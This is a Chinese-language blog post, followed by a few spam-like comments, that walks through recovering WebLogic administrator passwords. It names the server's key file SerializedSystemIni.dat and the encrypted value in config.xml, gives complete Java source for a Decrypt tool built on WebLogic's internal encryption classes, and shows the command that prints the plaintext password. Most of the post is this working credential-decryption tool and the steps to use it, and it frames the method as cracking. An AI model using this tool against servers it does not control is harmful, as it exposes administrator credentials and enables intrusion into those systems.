Weblogic密码破解

一、首先下载weblogic,并安装

下载链接(官方下载—->下载不了注册用户)
Oracle官网下载
安装webloic   (下一步下一步就可以)
注:我安装的是weblogic12c  对应的jdk版本是”1.7.0_13″  (12c建议java版本1.7的)

6619100681143106921


 

二、 破解准备

破解前我们需要找到服务器上的密钥文件和密文

密钥文件   SerializedSystemIni.dat
路径   weblogic安装目录\user_projects\domains\base_domain\security\SerializedSystemIni.dat

密文存放文件    config.xml
路径   weblogic安装目录\user_projects\domains\base_domain\config\config.xml

6630317898770490108


 

三、编译破解工具

在weblogic安装根目录新建文件夹(名字要英文,以免报错),里面新建一个java文件,Decrypt.java,名字不能错,必须和内容的class名字一样。

代码如下:
——————————————————————————————————————–
import weblogic.security.internal.*;
import weblogic.security.internal.encryption.*;

import java.io.PrintStream;

public class Decrypt {
static EncryptionService es = null;
static ClearOrEncryptedService ces = null;

public static void main(String[] args) {
String s = null;

if (args.length == 0) {
s = ServerAuthenticate.promptValue(“Password: “, false);
} else if (args.length == 1) {
s = args[0];
} else {
System.err.println(“Usage: java Decrypt [ password ]”);
}

es = SerializedSystemIni.getExistingEncryptionService();

if (es == null) {
System.err.println(“Unable to initialize encryption service”);

return;
}

ces = new ClearOrEncryptedService(es);

if (s != null) {
System.out.println(“\nDecrypted Password is:” + ces.decrypt(s));
}
}
}
——————————————————————————————————————–
把密钥文件放到同目录下
启动环境变量文件setWLSEnv.cmd
目录  weblogic安装目录\wlserver\server\bin\setWLSEnv.cmd

并编译Decrypt.java文件,生成Decrypt.class文件

2824601391309548951


 

四、破解weblogic密码

命令格式  java  Decrypt  {AES}kAB/cQrHbV0voR7UOr/AZlJVLZmFFBi3rGA4Y/fDRMo=

6631381126514407504

解出weblogic密码。

只要获取密钥文件和密文,一般都能破解weblogic密码。

共有 4 条评论

  1. Bill

    niubility ~ 😀

  2. manicure

    What’s up, everything is going nicely here and ofcourse every one is sharing information, that’s actually fine, keep up writing.

  3. manicure

    What’s up, every time i used to check weblog posts here early
    in the dawn, since i love to find out more and more.

  4. manicure

    Pretty element of content. I simply stumbled upon your weblog and in accession capital to
    say that I acquire actually loved account your
    blog posts. Anyway I will be subscribing for your augment or even I fulfillment you get
    right of entry to consistently rapidly.

Top